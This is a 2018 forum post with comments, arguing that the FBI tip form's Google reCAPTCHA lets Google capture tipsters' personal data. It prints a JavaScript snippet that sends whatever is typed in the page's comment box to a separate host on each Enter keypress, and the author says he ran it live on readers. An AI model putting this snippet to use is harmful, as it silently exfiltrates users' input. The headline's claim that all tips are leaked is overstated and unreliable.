« prev   random   next »

5
0

FBI leaks all tips online to Google, endangering anyone who submits a tip

By Patrick following x   2018 Feb 2, 9:27am 932 views   14 comments   watch   sfw   quote     share    


Summary: our government agencies at both the state and federal level are irresponsibly giving Google access to what should be citizens' private information.

The FBI has a form for reporting tips, here:

https://tips.fbi.gov/

Unfortunately, that FBI form includes a recaptcha from Google, which is used to prove you are a human being and not a robot. It looks like this:



You can verify that the FBI tip site is loading the recaptcha script from Google and not from its own servers by doing a "view source" in your browser on the tips.fbi.gov page and seeing this:

src="https://www.google.com/recaptcha/api/challenge?k=6LfDkLwSAAAAAD4IfxM2UpXo_jrotbWHVPWLwZVN&hl=en"

Including that script gives Google the easy ability to capture all the tip data that anyone submits to the FBI. In addition to the tip itself, the leaked data includes:

Your First Name
Your Last Name
Your Middle Name
Your Phone
Your Email
Your Street 1
Your Street 2
Your Suite/Apt/Mail Stop
Your City
Your State

Even if you lie on the form about those things, it's not hard for Google to know who you really are from your IP address and your browser's make and model. Google most likely has an extensive profile of you already from your phone usage (if you have an Android phone) and from your searching and surfing habits online.

This is extremely bad for the privacy of people submitting tips to the FBI and could put their lives in danger.

To illustrate the danger, I wrote this little script:


document.addEventListener("DOMContentLoaded", function(event) {
path = document.getElementById('accept_comment').getAttribute('href')
textarea = document.querySelector('textarea')
textarea.onkeyup = function(evt) {
if (evt.keyCode == 13) { // return key
console.log('sending fbi tip back to evil spying company, ha ha ha!')
fetch('https://sftech.fun' + path,
{
method: 'POST',
mode: 'no-cors',
body: 'comment_post_id=1275699&comment_content=' + encodeURI(textarea.value)
})
}
}
})


Then I included it on this very page (do a 'view source' and look for spy_on_fbi.js) in just the same way that the FBI includes Google's recapta. My little script will spy on every comment entered on this page, and copy it over to a page on a different website of mine, at http://sftech.fun/post/1275699 It won't even wait until you submit a comment, but will copy over what you're writing in the comment box at the bottom of this page every time you hit the enter key.

(Note added Tue 20 Mar 2018: disabled the spying for now, since I took down sftech.fun to save money - still happy to illustrate the principle to interested reporters though. Write p@patrick.net )

Please tell reporters about this. Other government agencies are also unwittingly offering great quantities of personal information about you to Google by including Google scripts, such as:

https://www.coveredca.com/
http://www.edd.ca.gov/
https://www.ice.gov/webform/hsi-tip-form (leaking via Google analytics script)
(let me know about others you find)

1   Sniper   ignore (11)   2018 Feb 2, 9:32am   ↑ like (2)   ↓ dislike (2)   quote        

Patrick says
So Google knows


I thought Google knows every time you touch your keyboard or touch screen?

Patrick says
This is extremely bad for the privacy of people


Very true!
2   someone else   ignore (0)   2018 Feb 2, 9:35am   ↑ like (0)   ↓ dislike (0)   quote        

One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com 127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com 127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com 127.0.0.1 staticxx.facebook.com


What that does is direct all use of those Google and Facebook domains to 127.0.0.1, which is simply your own computer, aka "localhost".

You'll quickly discover just how many government sites are sending your info to Google and Facebook by finding that they don't work with those /etc/hosts settings.
3   anonymous   ignore (null)   2018 Feb 2, 1:34pm   ↑ like (0)   ↓ dislike (0)   quote        

You think that's bad, I can't log into patrick.net from my job, as google would find out where I work. I used a gmail account when you implemented the new login system as I didn't realize I'd have to authenticate all the hosts that I use to access this forum.
4   Patrick   ignore (0)   2018 Feb 2, 1:47pm   ↑ like (0)   ↓ dislike (0)   quote        

You can just comment anonymously, like you did just now. No account required.

I don't use Google Recaptchas, or any Google software, but YouTube videos embedded in posts or comments do come from Google because they own YouTube.
5   Patrick   ignore (0)   2018 Feb 2, 1:58pm   ↑ like (1)   ↓ dislike (0)   quote        

Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534
6   WookieMan   ignore (0)   2018 Feb 2, 2:01pm   ↑ like (0)   ↓ dislike (0)   quote        

Patrick says
Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534


Not sure if it's something on my end. Site loads, but no content or story.
7   Patrick   ignore (0)   2018 Feb 2, 2:16pm   ↑ like (0)   ↓ dislike (0)   quote        

Hmmm, interesting. I can see it when logged it to hackernews, but not in incognito mode. Not even when I search for it:

https://hn.algolia.com/?query=fbi&sort=byDate&prefix=false&page=0&dateRange=last24h&type=story

Maybe it has to pass some censor first?

Also please upvote this:

https://www.reddit.com/r/government/comments/7uv0ry/if_you_submit_a_tip_to_the_fbi_google_knows_about/
8   Patrick   ignore (0)   2018 Feb 27, 9:18pm   ↑ like (0)   ↓ dislike (0)   quote        

I updated this post to illustrate just how irresponsible the FBI is being. Now every time you hit enter in this comment box, the comment will be copied over to http://sftech.fun/post/1275699
9   anonymous   ignore (null)   2018 Feb 28, 12:55am   ↑ like (0)   ↓ dislike (0)   quote        

FYI there is a windows HOSTS file, you should start with this one: http://winhelp2002.mvps.org/hosts.htm
10   anonymous   ignore (null)   2018 Feb 28, 6:39am   ↑ like (0)   ↓ dislike (0)   quote        

WOW, I really love what you did with this post Patrick. I am smarter having read this. great job.
11   bob2356   ignore (1)   2018 Feb 28, 10:25am   ↑ like (1)   ↓ dislike (0)   quote        

Patrick says
One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com 127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com 127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com 127.0.0.1 staticxx.facebook.com


You can look atl web sites like http://someonewhocares.org/hosts/http://someonewhocares.org/hosts/ that provide host files that block all kinds of nasties like adware. My hosts file runs something like 20 pages.
12   Hircus   ignore (0)   2018 Feb 28, 1:47pm   ↑ like (0)   ↓ dislike (0)   quote        

I agree, google could modify their code to harvest said information, but they currently don't.

But, I'm not sure this is any more dangerous than using a computer period. If you use windows/linux/mac, on any day a software update can come in that will start harvesting everything you type, and send it back to their mothership. Same goes for every web browser - they can easily capture everything you do.

Whether it be adding such capturing code to recaptcha, the OS, or a browser, they would probably get away with it for a while until someone notices and sounds the alarm. But, the repercussions would be grave for any big US company like Google/Microsoft.

btw - for those who aren't software developers: most of the web includes code that is loaded from other websites (it's usually related to advertising, analytics, social media, and content sharing). They all have the power to do this - go rogue (delivering an on-the-fly software update that you have no clue occurred) and start harvesting everything you type and/or see on that page. Your anti-virus won't help. The state of web security is sad one, but it's reality.
13   Patrick   ignore (0)   2018 Feb 28, 2:32pm   ↑ like (0)   ↓ dislike (0)   quote        

goat says
I agree, google could modify their code to harvest said information, but they currently don't.


What makes you sure that they don't?

They have the means, the motive, and the opportunity.
14   HEYYOU   ignore (13)   2018 Feb 28, 3:00pm   ↑ like (1)   ↓ dislike (0)   quote        

Google invading one's privacy?
As intended by all the worshipers of their GOD, Technology.
Their motto: "Bitch & moan & do nothing!"

Everyone knows there is nothing all the internet users can do.

Hypocrisyism,Stupidism, Retardism is damn entertaining.
Get those snowflakes a crying towel.




The Housing Trap
You're being set up to spend your life paying off a debt you don't need to take on, for a house that costs far more than it should. The conspirators are all around you, smiling to lure you in, carefully choosing their words and watching your reactions as they push your buttons, anxiously waiting for the moment when you sign the papers that will trap you and guarantee their payoff. Don't be just another victim of the housing market. Use this book to defend your freedom and defeat their schemes. You can win the game, but first you have to learn how to play it.
115 pages, $12.50

Kindle version available


about   best comments   contact   one year ago   suggestions